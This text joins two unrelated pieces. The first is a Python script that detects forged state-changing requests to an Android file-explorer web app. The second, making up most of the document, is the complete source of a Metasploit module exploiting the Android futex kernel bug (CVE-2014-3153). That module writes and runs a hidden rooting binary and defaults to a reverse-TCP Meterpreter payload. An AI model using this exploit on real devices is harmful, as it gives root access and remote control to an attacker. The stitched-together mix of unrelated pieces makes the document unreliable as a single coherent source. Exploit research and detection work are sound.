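An added detection example, not from the advisory or the vendor: given a request target and its headers (as a logging proxy in front of the app would see them), flag state-changing fileExplorer.html actions (`create`, `deleteFile`) whose Origin/Referer is missing or names a host other than the app's own. The sample requests are constructed from the session log above; `other-site.example` is a placeholder for a third-party page.

```python
from urllib.parse import urlsplit, parse_qs

# fileExplorer.html actions that modify device storage (from the advisory).
STATE_CHANGING = {"create", "deleteFile"}

def is_csrf_suspect(target, headers):
    """Flag a state-changing fileExplorer request whose Origin/Referer is absent
    or names a host other than the app's own.  The app accepts these actions
    over plain GET with no anti-CSRF token, so the source origin is the only
    signal a proxy or log review can use."""
    parts = urlsplit(target)
    action = parse_qs(parts.query).get("action", [""])[0]
    if parts.path != "/fileExplorer.html" or action not in STATE_CHANGING:
        return False
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return True  # no origin information at all: treat as suspect
    return urlsplit(source).netloc.lower() != headers.get("Host", "").lower()

def scan(requests):
    """Return the targets of the (target, headers) pairs that look forged."""
    return [t for t, h in requests if is_csrf_suspect(t, h)]

# Constructed sample requests modelled on the advisory's session log;
# other-site.example is a placeholder for a page the victim browses to.
APP = "192.168.1.2:8888"
LEGIT_CREATE = ("/fileExplorer.html?action=create&type=folder&folderName=test1",
                {"Host": APP, "Referer": f"http://{APP}/fileExplorer.html?action=brower&path=/sdcard"})
FORGED_DELETE = ("/fileExplorer.html?action=deleteFile&fileName=test",
                 {"Host": APP, "Referer": "http://other-site.example/page.html"})
BLIND_DELETE = ("/fileExplorer.html?action=deleteFile&fileName=test",
                {"Host": APP})  # referrer stripped, e.g. by a Referrer-Policy
BROWSE = ("/fileExplorer.html?action=brower&path=/sdcard",
          {"Host": APP, "Referer": "http://other-site.example/page.html"})

if __name__ == "__main__":
    print(scan([LEGIT_CREATE, FORGED_DELETE, BLIND_DELETE, BROWSE]))
```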
-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common

  def initialize(info={})
    super( update_info( info, {
      'Name'           => 'Android futex requeue kernel exploit',
      'Description'    => %q{
        This module exploits a bug in futex_requeue in the linux kernel.
        Any android phone with a kernel built before June 2014 should be vulnerable.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Pinkie Pie', # discovery
        'geohot',     # towelroot
        'timwr'       # metasploit module
      ],
      'References'     => [
        [ 'CVE', '2014-3153' ],
        [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],
        [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],
      ],
      'SessionTypes'   => [ 'meterpreter' ],
      'Platform'       => 'android',
      'Targets'        => [[ 'Automatic', { }]],
      'Arch'           => ARCH_DALVIK,
      'DefaultOptions' => {
        'PAYLOAD' => 'android/meterpreter/reverse_tcp',
      },
      'DefaultTarget'  => 0
    }))

    register_options([
      OptString.new("WritableDir", [ true, "Temporary directory to write files", "/data/local/tmp/" ]),
    ], self.class)
  end

  def put_local_file(remotefile)
    localfile = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.elf" )
    data = File.read(localfile, {:mode => 'rb'})
    write_file(remotefile, data)
  end

  def exploit
    workingdir = session.fs.dir.getwd
    exploitfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    payloadfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    put_local_file(exploitfile)
    cmd_exec('/system/bin/chmod 700 ' + exploitfile)
    write_file(payloadfile, payload.raw)

    tmpdir = datastore['WritableDir']
    rootclassdir = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}"
    rootpayload = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar"

    rootcmd = "mkdir #{rootclassdir} && "
    rootcmd += "cd #{rootclassdir} && "
    rootcmd += "cp " + payloadfile + " #{rootpayload} && "
    rootcmd += "chmod 766 #{rootpayload} && "
    rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload"

    process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})
    process.channel.read
  end
end

Source